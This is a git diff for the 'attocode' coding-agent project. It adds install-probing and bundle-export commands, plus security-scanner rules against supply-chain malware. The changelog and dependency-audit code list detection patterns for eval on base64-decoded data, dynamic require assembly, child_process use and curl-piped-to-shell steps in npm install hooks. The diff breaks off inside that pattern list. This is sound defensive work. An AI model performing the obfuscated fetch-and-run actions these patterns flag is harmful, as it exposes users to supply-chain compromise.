diff --git a/CHANGELOG.md b/CHANGELOG.md index 8c06ca45..89aad0ed 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,28 @@ All notable changes to the Attocode Python agent will be documented in this file The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). +## [Unreleased] + +## [0.2.16] - 2026-04-05 + +### Added + +#### Code-Intel Install Validation & Bundles +- `attocode code-intel probe-install ` — runtime MCP probing for installed file-based assistant configs; resolves `${workspaceFolder}` placeholders, supports local/user scopes, and optionally exercises `project_summary` when the install config pins a project path +- `ResolvedInstallSpec` in `installer.py` plus `resolve_install_spec()` helpers — normalizes installed MCP target configs across JSON/TOML/YAML-backed assistants so install status and probe flows share one source of truth +- `attocode code-intel bundle export` / `bundle inspect` — export portable local code-intel bundles and inspect bundle metadata, artifact presence, sizes, and SHA-256 hashes +- Bundle metadata now records schema version, creation timestamp, project name, bundled artifact inventory, and the shipping `attocode` version for release/debugging workflows + +#### GlassWorm-Class Supply-Chain Detection +- 7 new anti-pattern rules in `security_scan` targeting stealth supply-chain malware (NPM/VS Code marketplace attacks): + - `invisible_unicode_run` (HIGH, CWE-506) — detects runs of zero-width / variation-selector / tag-character steganographic payloads; scans comment lines since that is a common hiding spot + - `js_eval_on_decoded`, `js_eval_on_buffer`, `js_eval_on_fromcharcode` (CRITICAL, CWE-94) — compound obfuscation patterns where JavaScript runs dynamic code on `atob`/`Buffer.from(..., 'base64')`/`String.fromCharCode` output + - `python_eval_on_b64decode`, `python_exec_on_codecs_decode`, `python_exec_on_marshal_loads` (CRITICAL, CWE-94) — Python equivalents covering base64 decode, codecs/zlib/bytes.fromhex, and marshal.loads +- Additional JavaScript obfuscation heuristics: `js_dynamic_require_concat` for Shai-Hulud-style dynamic `require()` string assembly and `js_settimer_string_arg` for string-based `setTimeout`/`setInterval` execution +- `scan_comments` field on `SecurityPattern` dataclass — allows individual patterns to opt into scanning comment lines (previously all comments were globally skipped) +- Install-hook scanner in `DependencyAuditor._audit_install_hooks` — flags `package.json` `preinstall`/`install`/`postinstall` scripts containing obfuscation or remote-fetch indicators (curl-piped-to-shell, remote scripts, inline `node -e`, `child_process` require, eval/atob/base64) +- Shared `iter_pattern_matches` generator in new `src/attocode/integrations/security/matcher.py` — consolidates comment-skip, language-filter, and per-pattern iteration logic used by both the filesystem scanner and the DB-backed scanner + ## [0.2.15] - 2026-04-04 ### Added diff --git a/docs/ast-and-code-intelligence.md b/docs/ast-and-code-intelligence.md index 29afa7f0..84eb0917 100644 --- a/docs/ast-and-code-intelligence.md +++ b/docs/ast-and-code-intelligence.md @@ -421,7 +421,7 @@ The MCP server exposes 27 tools across 6 categories: | Tool | Parameters | Description | |------|-----------|-------------| | `semantic_search` | `query`, `top_k`, `file_filter` | Natural language code search (vector + keyword RRF) | -| `security_scan` | `mode`, `path` | Secret detection, anti-patterns, dependency issues | +| `security_scan` | `mode`, `path` | Secret detection, anti-patterns (incl. supply-chain obfuscation), dependency & install-hook issues | #### LSP diff --git a/docs/roadmap.md b/docs/roadmap.md index 3b5a6dd7..6e935089 100644 --- a/docs/roadmap.md +++ b/docs/roadmap.md @@ -1,5 +1,13 @@ # Attocode Roadmap +## v0.2.16 -- Install Probing, Portable Bundles & Supply-Chain Hardening (Released 2026-04-05) + +1. ~~**Installed-target runtime probing**~~ -- DONE: `attocode code-intel probe-install` validates file-based MCP installs by launching the configured stdio command, resolving `${workspaceFolder}`, and optionally exercising `project_summary` +2. ~~**Portable code-intel bundles**~~ -- DONE: `attocode code-intel bundle export` / `bundle inspect` package local artifacts with metadata, hashes, and version stamping for offline transfer and debugging +3. ~~**Shared install config resolution**~~ -- DONE: `ResolvedInstallSpec` and `resolve_install_spec()` unify JSON/TOML/YAML-backed assistant config parsing for install, status, and probe flows +4. ~~**Supply-chain malware detection expansion**~~ -- DONE: new `security_scan` anti-patterns for invisible Unicode payloads, eval-on-decoded-data obfuscation, dynamic `require()` assembly, and string-based timer execution +5. ~~**Install-hook auditing**~~ -- DONE: dependency audit now flags suspicious `preinstall`/`install`/`postinstall` scripts and shares matcher behavior between local and DB-backed scanners + ## v0.2.6 -- Language Support, Search Quality & Architecture (Released 2026-03-24) 1. ~~**Language-specific symbol extraction**~~ -- DONE: 11 new tree-sitter configs (Erlang, Clojure, Perl, Crystal, Dart, OCaml, F#, Julia, Nim, R, Objective-C); total 36 languages supported diff --git a/pyproject.toml b/pyproject.toml index 22d7dcb8..953f191d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -4,7 +4,7 @@ build-backend = "hatchling.build" [project] name = "attocode" -version = "0.2.15" +version = "0.2.16" description = "Production AI coding agent" readme = "README.md" requires-python = ">=3.12" @@ -201,7 +201,7 @@ exclude_lines = [ ] [tool.bumpversion] -current_version = "0.2.15" +current_version = "0.2.16" commit = false tag = false diff --git a/src/attocode/__init__.py b/src/attocode/__init__.py index ca3559f2..b3ef186c 100644 --- a/src/attocode/__init__.py +++ b/src/attocode/__init__.py @@ -1,3 +1,3 @@ """Attocode - Production AI coding agent.""" -__version__ = "0.2.15" +__version__ = "0.2.16" diff --git a/src/attocode/code_intel/GUIDELINES.md b/src/attocode/code_intel/GUIDELINES.md index 1243c08a..a2eba37f 100644 --- a/src/attocode/code_intel/GUIDELINES.md +++ b/src/attocode/code_intel/GUIDELINES.md @@ -59,7 +59,7 @@ | Tool | Purpose | When to Use | |------|---------|-------------| | `semantic_search` | Natural language code search. Optional `mode`: "auto" (default), "keyword" (fast), "vector" (wait for embeddings) | Find code by description, not name | -| `security_scan` | Secret detection, anti-patterns, dependency issues | Security review | +| `security_scan` | Secret detection (13 patterns), anti-patterns (21 rules incl. supply-chain obfuscation: invisible Unicode, eval-on-decoded-data, install-hook scrutiny), dependency issues | Security review, supply-chain hardening | ### Memory & Recall (50–500 tokens each) diff --git a/src/attocode/code_intel/bundle.py b/src/attocode/code_intel/bundle.py new file mode 100644 index 00000000..e95a9ed4 --- /dev/null +++ b/src/attocode/code_intel/bundle.py @@ -0,0 +1,88 @@ +"""Portable local artifact bundles for code-intel state.""" + +from __future__ import annotations + +import hashlib +import json +import tarfile +from datetime import UTC, datetime +from pathlib import Path +from tempfile import TemporaryDirectory + +from attocode import __version__ + +_SCHEMA_VERSION = 1 +_ARTIFACTS = ( + ("artifacts/index/symbols.db", ".attocode/index/symbols.db"), + ("artifacts/vectors/embeddings.db", ".attocode/vectors/embeddings.db"), + ("artifacts/cache/memory.db", ".attocode/cache/memory.db"), + ("artifacts/adrs.db", ".attocode/adrs.db"), +) + + +def _sha256(path: Path) -> str: + digest = hashlib.sha256() + with path.open("rb") as fh: + for chunk in iter(lambda: fh.read(65536), b""): + digest.update(chunk) + return digest.hexdigest() + + +def _metadata(project_dir: Path) -> dict[str, object]: + artifacts: list[dict[str, object]] = [] + for bundle_path, rel_path in _ARTIFACTS: + source = project_dir / rel_path + present = source.exists() + artifacts.append({ + "path": bundle_path, + "present": present, + "size_bytes": source.stat().st_size if present else 0, + "sha256": _sha256(source) if present else None, + }) + + return { + "schema_version": _SCHEMA_VERSION, + "created_at": datetime.now(UTC).isoformat().replace("+00:00", "Z"), + "project_name": project_dir.name, + "project_root_basename": project_dir.name, + "attocode_version": __version__, + "artifacts": artifacts, + } + + +def export_bundle(project_dir: str, output_path: str) -> Path: + """Export local code-intel artifacts into a tar.gz bundle.""" + project_root = Path(project_dir).resolve() + destination = Path(output_path).resolve() + destination.parent.mkdir(parents=True, exist_ok=True) + metadata = _metadata(project_root) + + with TemporaryDirectory(prefix="attocode-bundle-") as tmpdir: + root = Path(tmpdir) / "attocode-bundle" + root.mkdir(parents=True, exist_ok=True) + metadata_path = root / "metadata.json" + metadata_path.write_text(json.dumps(metadata, indent=2) + "\n", encoding="utf-8") + + for bundle_path, rel_path in _ARTIFACTS: + source = project_root / rel_path + if not source.exists(): + continue + target = root / bundle_path + target.parent.mkdir(parents=True, exist_ok=True) + target.write_bytes(source.read_bytes()) + + with tarfile.open(destination, "w:gz") as archive: + archive.add(root, arcname="attocode-bundle") + + return destination + + +def inspect_bundle(bundle_path: str) -> dict[str, object]: + """Read bundle metadata without touching local project state.""" + bundle = Path(bundle_path).resolve() + with tarfile.open(bundle, "r:gz") as archive: + metadata_member = archive.getmember("attocode-bundle/metadata.json") + fh = archive.extractfile(metadata_member) + if fh is None: + raise FileNotFoundError("metadata.json missing from bundle") + return json.loads(fh.read().decode("utf-8")) diff --git a/src/attocode/code_intel/cli.py b/src/attocode/code_intel/cli.py index b741263d..ef44a2c0 100644 --- a/src/attocode/code_intel/cli.py +++ b/src/attocode/code_intel/cli.py @@ -41,6 +41,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal _cmd_serve(args[1:], debug=debug) elif cmd == "status": _cmd_status() + elif cmd == "probe-install": + _cmd_probe_install(args[1:]) elif cmd == "notify": _cmd_notify(args[1:]) elif cmd == "index": @@ -69,6 +71,8 @@ def dispatch_code_intel(parts: tuple[str, ...] | list[str], *, debug: bool = Fal _cmd_verify(args[1:]) elif cmd == "reindex": _cmd_reindex(args[1:]) + elif cmd == "bundle": + _cmd_bundle(args[1:]) else: print(f"Unknown code-intel command: {cmd}", file=sys.stderr) _print_help() @@ -86,6 +90,7 @@ def _print_help() -> None: " serve Run MCP server directly (stdio or SSE)\n" " index Build or check embedding index for semantic search\n" " status Check installation status across all targets\n" + " probe-install Run a runtime MCP probe for an installed target\n" " notify Notify server about changed files (for hooks)\n" " test-connection Verify connectivity to the remote server\n" " watch Watch filesystem for changes and notify remote server\n" @@ -99,6 +104,8 @@ def _print_help() -> None: " deps Show file dependencies and dependents\n" "\n" "Maintenance commands:\n" + " bundle export Export local code-intel artifacts into a bundle\n" + " bundle inspect Inspect bundle metadata and artifacts\n" " gc Run garbage collection (orphaned embeddings + content)\n" " verify Run integrity checks on the index\n" " reindex Force a full reindex of the project\n" @@ -134,6 +141,11 @@ def _print_help() -> None: " --global Install globally (Claude, Codex, Zed, Gemini, Junie, Amp)\n" " --hooks Also install PostToolUse hooks (Claude Code)\n" "\n" + "Probe options:\n" + " probe-install Probe an installed file-based target by launching MCP stdio\n" + " --project Project directory to substitute for ${workspaceFolder}\n" + " --global Read the user/global config when the target supports it\n" + "\n" "Serve options:\n" " --transport Transport protocol: stdio (default), sse, or http\n" " --host Server host address (default: 127.0.0.1)\n" @@ -167,6 +179,10 @@ def _print_help() -> None: " --top Number of results (query: default 10, hotspots: default 15)\n" " --filter File filter glob for semantic search (e.g. '*.py')\n" " --search Search for symbol by name (symbols command)\n" + "\n" + "Bundle options:\n" + " bundle export --output [--project ]\n" + " bundle inspect \n" ) @@ -205,6 +221,10 @@ def _parse_opts(args: list[str]) -> tuple[str | None, str, str, bool]: return target, project_dir, scope, hooks +def _args_include_project_flag(args: list[str]) -> bool: + return any(arg == "--project" or arg.startswith("--project=") for arg in args) + + def _cmd_install(args: list[str]) -> None: from attocode.code_intel.installer import ALL_TARGETS_STR, install, install_hooks @@ -507,6 +527,102 @@ def _cmd_status() -> None: print(f" Entry point: {resolved}") +def _cmd_probe_install(args: list[str]) -> None: + """Run a runtime MCP probe for a file-based installed target.""" + from attocode.code_intel.installer import ALL_TARGETS_STR + from attocode.code_intel.probe import probe_install + + target, project_dir, scope, _hooks = _parse_opts(args) + if not target: + print(f"Error: specify a target ({ALL_TARGETS_STR})", file=sys.stderr) + sys.exit(1) + + exit_code = probe_install( + target, + project_dir=project_dir, + scope=scope, + force_project_probe=_args_include_project_flag(args), + ) + if exit_code: + sys.exit(exit_code) + + +def _cmd_bundle(args: list[str]) -> None: + """Export or inspect local code-intel bundles.""" + if not args or args[0] in {"-h", "--help", "help"}: + print( + "Usage:\n" + " attocode code-intel bundle export [--project ] [--output ]\n" + " attocode code-intel bundle inspect \n" + ) + return + + subcmd = args[0] + if subcmd == "export": + from attocode.code_intel.bundle import export_bundle + + _, project_dir, _, _ = _parse_opts(args[1:]) + output_path = "" + tail = args[1:] + i = 0 + while i < len(tail): + arg = tail[i] + if arg == "--output" and i + 1 < len(tail): + output_path = tail[i + 1] + i += 2 + elif arg.startswith("--output="): + output_path = arg.split("=", 1)[1] + i += 1 + else: + i += 1 + + if not output_path: + bundle_name = f"attocode-bundle-{os.path.basename(os.path.abspath(project_dir))}.tar.gz" + output_path = os.path.join(os.getcwd(), bundle_name) + + destination = export_bundle(project_dir, output_path) + print(f"Bundle exported to {destination}") + return + + if subcmd == "inspect": + import json as json_mod + import tarfile + + from attocode.code_intel.bundle import inspect_bundle + + bundle_path = "" + for arg in args[1:]: + if not arg.startswith("-"): + bundle_path = arg + break + if not bundle_path: + print("Error: specify a bundle path.", file=sys.stderr) + sys.exit(1) + + try: + metadata = inspect_bundle(bundle_path) + except (FileNotFoundError, OSError, tarfile.TarError, KeyError, json_mod.JSONDecodeError) as exc: + print(f"Error: could not inspect bundle: {exc}", file=sys.stderr) + sys.exit(1) + print(f"Bundle: {os.path.abspath(bundle_path)}") + print(f" Schema version: {metadata.get('schema_version')}") + print(f" Created at: {metadata.get('created_at')}") + print(f" Project: {metadata.get('project_name')}") + print(f" Attocode version: {metadata.get('attocode_version')}") + print(" Artifacts:") + for artifact in metadata.get("artifacts", []): + status = "present" if artifact.get("present") else "missing" + print( + " " + f"{artifact.get('path')}: {status}, " + f"size={artifact.get('size_bytes')}, sha256={artifact.get('sha256')}" + ) + return + + print(f"Error: unknown bundle command '{subcmd}'", file=sys.stderr) + sys.exit(1) + + def _cmd_notify(args: list[str]) -> None: """Notify the server about changed files via the notification queue. diff --git a/src/attocode/code_intel/installer.py b/src/attocode/code_intel/installer.py index 0e637225..aa1bd462 100644 --- a/src/attocode/code_intel/installer.py +++ b/src/attocode/code_intel/installer.py @@ -35,7 +35,9 @@ import subprocess import sys import tomllib +from dataclasses import dataclass from pathlib import Path +from typing import Any import tomli_w @@ -63,6 +65,340 @@ ALL_TARGETS_STR: str = ", ".join(ALL_TARGETS) +@dataclass(frozen=True) +class ResolvedInstallSpec: + """Normalized read-only view of an installed MCP target config.""" + + target: str + scope: str + config_path: str | None + command: str + args: list[str] + env: dict[str, str] + source_kind: str + unsupported_reason: str | None = None + + @property + def is_supported(self) -> bool: + return self.unsupported_reason is None + + +def _read_json_file(path: Path) -> dict[str, Any] | None: + try: + raw = json.loads(path.read_text(encoding="utf-8")) + except (json.JSONDecodeError, OSError): + return None + return raw if isinstance(raw, dict) else None + + +def _read_toml_file(path: Path) -> dict[str, Any] | None: + try: + raw = tomllib.loads(path.read_text(encoding="utf-8")) + except (tomllib.TOMLDecodeError, OSError): + return None + return raw if isinstance(raw, dict) else None + + +def _read_yaml_file(path: Path) -> dict[str, Any] | None: + import yaml + + try: + raw = yaml.safe_load(path.read_text(encoding="utf-8")) + except (yaml.YAMLError, OSError): + return None + return raw if isinstance(raw, dict) else None + + +def _normalize_standard_entry( + target: str, + scope: str, + config_path: Path, + entry: dict[str, Any], + *, + source_kind: str, +) -> ResolvedInstallSpec | None: + command = entry.get("command") + args = entry.get("args", []) + env = entry.get("env", {}) + if not isinstance(command, str): + return None + if not isinstance(args, list) or not all(isinstance(arg, str) for arg in args): + return None + if not isinstance(env, dict) or not all(isinstance(k, str) and isinstance(v, str) for k, v in env.items()): + return None + return ResolvedInstallSpec( + target=target, + scope=scope, + config_path=str(config_path), + command=command, + args=list(args), + env=dict(env), + source_kind=source_kind, + ) + + +def _normalize_zed_entry( + target: str, + scope: str, + config_path: Path, + entry: dict[str, Any], +) -> ResolvedInstallSpec | None: + command_block = entry.get("command") + if not isinstance(command_block, dict): + return None + command = command_block.get("path") + args = command_block.get("args", []) + if not isinstance(command, str): + return None + if not isinstance(args, list) or not all(isinstance(arg, str) for arg in args): + return None + return ResolvedInstallSpec( + target=target, + scope=scope, + config_path=str(config_path), + command=command, + args=list(args), + env={}, + source_kind="custom-json", + ) + + +def _normalize_opencode_entry( + target: str, + scope: str, + config_path: Path, + entry: dict[str, Any], +) -> ResolvedInstallSpec | None: + command_parts = entry.get("command") + if not isinstance(command_parts, list) or not command_parts or not all(isinstance(part, str) for part in command_parts): + return None + env = entry.get("env", {}) + if not isinstance(env, dict) or not all(isinstance(k, str) and isinstance(v, str) for k, v in env.items()): + env = {} + return ResolvedInstallSpec( + target=target, + scope=scope, + config_path=str(config_path), + command=command_parts[0], + args=list(command_parts[1:]), + env=dict(env), + source_kind="custom-json", + ) + + +def _normalize_goose_entry( + target: str, + scope: str, + config_path: Path, + entry: dict[str, Any], +) -> ResolvedInstallSpec | None: + import shlex + + cmd = entry.get("cmd") + if not isinstance(cmd, str) or not cmd.strip(): + return None + parts = shlex.split(cmd) + if not parts: + return None + envs = entry.get("envs", {}) + if not isinstance(envs, dict) or not all(isinstance(k, str) and isinstance(v, str) for k, v in envs.items()): + envs = {} + return ResolvedInstallSpec( + target=target, + scope=scope, + config_path=str(config_path), + command=parts[0], + args=parts[1:], + env=dict(envs), + source_kind="yaml", + ) + + +def _unsupported_spec(target: str, scope: str, reason: str) -> ResolvedInstallSpec: + return ResolvedInstallSpec( + target=target, + scope=scope, + config_path=None, + command="", + args=[], + env={}, + source_kind="unsupported", + unsupported_reason=reason, + ) + + +def resolve_install_spec(target: str, project_dir: str = ".", scope: str = "local") -> ResolvedInstallSpec | None: + """Resolve the installed config for a target into a normalized spec. + + Returns ``None`` when the target is supported but not currently installed. + Returns a ``ResolvedInstallSpec`` with ``unsupported_reason`` for targets + that are intentionally excluded from probing in the non-breaking phase. + """ + project_root = Path(project_dir) + + if target == "claude": + return _unsupported_spec( + target, + scope, + "claude uses CLI-managed installs; probe-install only supports file-based targets in v1.", + ) + if target == "intellij": + return _unsupported_spec( + target, + scope, + "intellij is manual-only; probe-install only supports file-based targets in v1.", + ) + if target not in ALL_TARGETS: + return _unsupported_spec(target, scope, f"Unknown target '{target}'.") + + if target in _JSON_CONFIG_TARGETS: + config_dirs = { + "cursor": ".cursor", + "windsurf": ".windsurf", + "vscode": ".vscode", + "roo-code": ".roo", + "trae": ".trae", + "kiro": os.path.join(".kiro", "settings"), + "firebase": ".idx", + "continue": ".continue", + } + config_path = project_root / config_dirs[target] / "mcp.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "codex": + config_path = Path.home() / ".codex" / "config.toml" if scope == "user" else project_root / ".codex" / "config.toml" + data = _read_toml_file(config_path) + entry = data.get("mcp_servers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="toml") + + if target == "claude-desktop": + config_dir = _get_user_config_dir("claude-desktop") + if config_dir is None: + return None + config_path = config_dir / "claude_desktop_config.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "cline": + config_dir = _get_user_config_dir("cline") + if config_dir is None: + return None + config_path = config_dir / "cline_mcp_settings.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "zed": + config_path = ( + Path(os.environ.get("XDG_CONFIG_HOME", Path.home() / ".config")) / "zed" / "settings.json" + if scope == "user" + else project_root / ".zed" / "settings.json" + ) + data = _read_json_file(config_path) + entry = data.get("context_servers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_zed_entry(target, scope, config_path, entry) + + if target == "opencode": + config_path = Path(os.environ.get("XDG_CONFIG_HOME", Path.home() / ".config")) / "opencode" / "config.json" + data = _read_json_file(config_path) + entry = data.get("mcp", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_opencode_entry(target, scope, config_path, entry) + + if target == "gemini-cli": + config_path = Path.home() / ".gemini" / "settings.json" if scope == "user" else project_root / ".gemini" / "settings.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "amazon-q": + config_path = Path.home() / ".aws" / "amazonq" / "mcp.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "copilot-cli": + config_path = Path.home() / ".copilot" / "mcp-config.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "junie": + config_path = Path.home() / ".junie" / "mcp" / "mcp.json" if scope == "user" else project_root / ".junie" / "mcp" / "mcp.json" + data = _read_json_file(config_path) + entry = data.get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="json") + + if target == "amp": + config_path = ( + Path(os.environ.get("XDG_CONFIG_HOME", Path.home() / ".config")) / "amp" / "settings.json" + if scope == "user" + else project_root / ".amp" / "settings.json" + ) + data = _read_json_file(config_path) + entry = data.get("amp", {}).get("mcpServers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="custom-json") + + if target == "hermes": + config_path = Path.home() / ".hermes" / "config.yaml" + data = _read_yaml_file(config_path) + entry = data.get("mcp_servers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="yaml") + + if target == "goose": + config_path = Path(os.environ.get("XDG_CONFIG_HOME", Path.home() / ".config")) / "goose" / "config.yaml" + data = _read_yaml_file(config_path) + extensions = data.get("extensions", []) if data else [] + if not isinstance(extensions, list): + return None + entry = next( + ( + ext for ext in extensions + if isinstance(ext, dict) and ext.get("name") == "attocode-code-intel" + ), + None, + ) + if not isinstance(entry, dict): + return None + return _normalize_goose_entry(target, scope, config_path, entry) + + if target == "gsd": + config_path = Path.home() / ".gsd" / "mcp.json" if scope == "user" else project_root / ".gsd" / "mcp.json" + data = _read_json_file(config_path) + entry = data.get("servers", {}).get("attocode-code-intel") if data else None + if not isinstance(entry, dict): + return None + return _normalize_standard_entry(target, scope, config_path, entry, source_kind="custom-json") + + return None + + def _find_command(project_dir: str | None = None) -> str: """Determine the right command to invoke the MCP server. diff --git a/src/attocode/code_intel/probe.py b/src/attocode/code_intel/probe.py new file mode 100644 index 00000000..c0458573 --- /dev/null +++ b/src/attocode/code_intel/probe.py @@ -0,0 +1,110 @@ +"""Runtime MCP install probing for file-based assistant configurations.""" + +from __future__ import annotations + +import asyncio +import os +import sys +from dataclasses import replace + +from attocode.code_intel.installer import ResolvedInstallSpec, resolve_install_spec +from attocode.integrations.mcp.client import MCPClient + + +def _substitute_workspace_folder(value: str, project_dir: str) -> str: + return value.replace("${workspaceFolder}", project_dir) + + +def _materialize_spec(spec: ResolvedInstallSpec, project_dir: str) -> ResolvedInstallSpec: + """Resolve runtime placeholders before spawning the stdio process.""" + env = { + key: _substitute_workspace_folder(value, project_dir) + for key, value in spec.env.items() + } + return replace( + spec, + command=_substitute_workspace_folder(spec.command, project_dir), + args=[_substitute_workspace_folder(arg, project_dir) for arg in spec.args], + env=env, + ) + + +def _has_concrete_project_arg(args: list[str]) -> bool: + for idx, arg in enumerate(args): + if arg == "--project" and idx + 1 < len(args): + return True + if arg.startswith("--project="): + return True + return False + + +async def _run_probe( + spec: ResolvedInstallSpec, + *, + project_dir: str, + should_call_project_summary: bool, +) -> tuple[int, int]: + client = MCPClient( + spec.command, + server_args=spec.args, + server_name=spec.target, + env=spec.env, + cwd=project_dir, + ) + try: + await client.connect() + if not client.is_connected: + raise RuntimeError("MCP initialize did not complete") + if should_call_project_summary: + result = await client.call_tool("project_summary", {"max_tokens": 128}) + if not result.success: + raise RuntimeError(result.error or "project_summary probe failed") + return len(client.tools), 0 + finally: + await client.disconnect() + + +def probe_install( + target: str, + project_dir: str = ".", + scope: str = "local", + *, + force_project_probe: bool = False, +) -> int: + """Run a runtime MCP probe for an installed assistant target. + + Exit codes: + 0: success + 1: target missing or probe failed + 2: unsupported target for v1 probing + """ + abs_project = os.path.abspath(project_dir) + resolved = resolve_install_spec(target, project_dir=abs_project, scope=scope) + if resolved is None: + print(f"{target}: attocode-code-intel is not installed for scope={scope}.", file=sys.stderr) + return 1 + if not resolved.is_supported: + print(f"{target}: {resolved.unsupported_reason}", file=sys.stderr) + return 2 + + runtime_spec = _materialize_spec(resolved, abs_project) + should_call_project_summary = force_project_probe or _has_concrete_project_arg(runtime_spec.args) + + try: + tools_count, _ = asyncio.run( + _run_probe( + runtime_spec, + project_dir=abs_project, + should_call_project_summary=should_call_project_summary, + ) + ) + except Exception as exc: + print(f"{target}: probe failed ({type(exc).__name__}: {exc})", file=sys.stderr) + return 1 + + project_note = " with project_summary probe" if should_call_project_summary else "" + print( + f"{target}: probe succeeded{project_note} " + f"({runtime_spec.command} {' '.join(runtime_spec.args)}; tools={tools_count})" + ) + return 0 diff --git a/src/attocode/code_intel/server.py b/src/attocode/code_intel/server.py index bc780da3..d5ed3842 100644 --- a/src/attocode/code_intel/server.py +++ b/src/attocode/code_intel/server.py @@ -626,7 +626,12 @@ def _instrument_all_tools() -> None: # Subcommands that should be dispatched to the CLI handler instead of # starting the MCP server. -_CLI_SUBCOMMANDS = {"install", "uninstall", "serve", "status", "notify", "connect", "test-connection", "watch", "help", "--help", "-h", "query", "symbols", "impact", "hotspots", "deps", "dead-code", "gc", "verify", "reindex"} +_CLI_SUBCOMMANDS = { + "install", "uninstall", "serve", "status", "probe-install", "notify", + "connect", "test-connection", "watch", "help", "--help", "-h", + "query", "symbols", "impact", "hotspots", "deps", "dead-code", + "gc", "verify", "reindex", "bundle", +} def main() -> None: diff --git a/src/attocode/code_intel/storage/security_scanner_db.py b/src/attocode/code_intel/storage/security_scanner_db.py index 8dfe6b21..c6679384 100644 --- a/src/attocode/code_intel/storage/security_scanner_db.py +++ b/src/attocode/code_intel/storage/security_scanner_db.py @@ -11,6 +11,8 @@ import uuid from typing import TYPE_CHECKING +from attocode.integrations.security.matcher import iter_pattern_matches + if TYPE_CHECKING: from sqlalchemy.ext.asyncio import AsyncSession @@ -126,31 +128,20 @@ async def db_security_scan( files_scanned += 1 file_lang = _detect_language(path) - for line_no, line in enumerate(text.splitlines(), 1): - # Skip comment lines - stripped = line.strip() - if stripped.startswith("#") or stripped.startswith("//"): - continue - - for pat in patterns: - # Filter by language if pattern is language-specific - if pat.languages and file_lang not in pat.languages: - continue - - if pat.pattern.search(line): - sev = str(pat.severity) - severity_counts[sev] = severity_counts.get(sev, 0) + 1 - findings.append({ - "pattern": pat.name, - "severity": sev, - "category": str(pat.category), - "cwe_id": pat.cwe_id, - "file": path, - "line": line_no, - "message": pat.message, - "recommendation": pat.recommendation, - "snippet": stripped[:200], - }) + for line_no, line, pat in iter_pattern_matches(text, patterns, file_lang): + sev = str(pat.severity) + severity_counts[sev] = severity_counts.get(sev, 0) + 1 + findings.append({ + "pattern": pat.name, + "severity": sev, + "category": str(pat.category), + "cwe_id": pat.cwe_id, + "file": path, + "line": line_no, + "message": pat.message, + "recommendation": pat.recommendation, + "snippet": line.strip()[:200], + }) # Compute compliance score score = 100 - ( diff --git a/src/attocode/integrations/mcp/client.py b/src/attocode/integrations/mcp/client.py index c1714ca9..7e036769 100644 --- a/src/attocode/integrations/mcp/client.py +++ b/src/attocode/integrations/mcp/client.py @@ -30,7 +30,7 @@ def _expand_env(env: dict[str, str] | None) -> dict[str, str] | None: base = os.environ.copy() for key, val in env.items(): expanded = re.sub( - r"\$\{(\w+)\}", + r"\$\{(?:env:)?(\w+)\}", lambda m: os.environ.get(m.group(1), ""), val, ) @@ -70,11 +70,13 @@ def __init__( server_args: list[str] | None = None, server_name: str = "", env: dict[str, str] | None = None, + cwd: str | None = None, ) -> None: self._command = server_command self._args = server_args or [] self._server_name = server_name self._env = env + self._cwd = cwd self._process: asyncio.subprocess.Process | None = None self._tools: list[MCPTool] = [] self._initialized = False @@ -89,6 +91,7 @@ async def connect(self) -> None: stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, env=_expand_env(self._env), + cwd=self._cwd, ) # Send initialize request diff --git a/src/attocode/integrations/security/dependency_audit.py b/src/attocode/integrations/security/dependency_audit.py index 21b50a6b..528bdae4 100644 --- a/src/attocode/integrations/security/dependency_audit.py +++ b/src/attocode/integrations/security/dependency_audit.py @@ -24,6 +24,46 @@ _OSV_CACHE_FILE = "osv-cache.json" _OSV_CACHE_TTL = 86400 # 24 hours +# Suspicious tokens in package.json install hooks (GlassWorm-class supply-chain attacks) +_SUSPICIOUS_HOOK_TOKENS: list[tuple[str, "re.Pattern[str]", str]] = [ + ("hook_eval", re.compile(r"\beval\b"), "dynamic evaluation in install hook"), + ("hook_atob", re.compile(r"\batob\s*\("), "atob decoder in install hook"), + ("hook_buffer_b64", re.compile(r"Buffer\.from\s*\([^)]*base64", re.IGNORECASE), + "Buffer.from base64 decode in install hook"), + ("hook_child_process", re.compile(r"require\s*\(\s*['\"]child_process['\"]\s*\)"), + "child_process require in install hook"), + ("hook_node_dash_e", re.compile(r"\bnode\s+-e\b"), + "node -e inline script in install hook"), + ("hook_curl_pipe_sh", 